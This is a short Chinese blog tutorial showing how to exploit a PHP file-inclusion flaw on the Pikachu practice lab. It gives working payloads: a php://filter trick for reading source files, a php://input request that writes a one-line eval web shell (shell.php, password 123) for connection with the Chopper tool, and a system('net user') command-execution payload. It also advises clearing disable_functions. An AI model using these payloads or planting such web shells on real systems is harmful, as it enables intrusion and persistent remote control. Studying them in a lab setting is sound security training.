当前位置:网站首页>包含漏洞-读写文件以及执行命令
包含漏洞-读写文件以及执行命令
2022-08-08 06:50:00 【常家壮】
包含漏洞可以读写文件以及执行命令
读文件:
最好转化为base64,防止有特殊字符显示不出来
php://filter/read=convert.base64-encode/resource=【文件名】
用pikachu靶场演示:
读一下当前展示的这个PHP内容
写文件:
写入一句话木马 我用的是菜刀马 <?php @eval($_POST['123']);?>
需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
之后在数据包里写入一句话<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123]); ?>'); ?>
用菜刀连接:连接密码 123
由于是在当前文件夹写入的木马文件,所以是在fi_remote.php 同一目录下的
命令执行:
- phpStudy 只有在allow _url_include为on的时候才可以使用
- phpStudy 下找到php.ini打开,查找 disable_functions = 将其清空删掉重启apache 才能看到结果
需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
提交数据包为:<?php system('net user');?>
边栏推荐
猜你喜欢
随机推荐
【Excel】csv文件修改分隔符
请问ots表有点大,现在是通过外表查询的除了用sql还有其他方法优化嘛?
蓝牙5.2新特性 - Enhance ATT
动手学数理统计(1)
XXL-JOB入门教学
【Android安全】ActivityManager.isUserAMonkey API
论文翻译:《DeepTorrent:一种基于深度学习的方法,用于预测DNA N4-甲基环肽位点》
goroutine 调度
VISIO 2003 在线更新的注册文件
脑筋急转弯
Golang 简单的读负载均衡
归并排序
“重载”与“重写”的区别
物联网安全-单向散列算法
Day37------网络
golang 服务诡异499、504网络故障排查
动手学数理统计(2)
生产者消费者模型
list set map queue deque stack 的遍历总结
超强的企业建站系统介绍:功能模块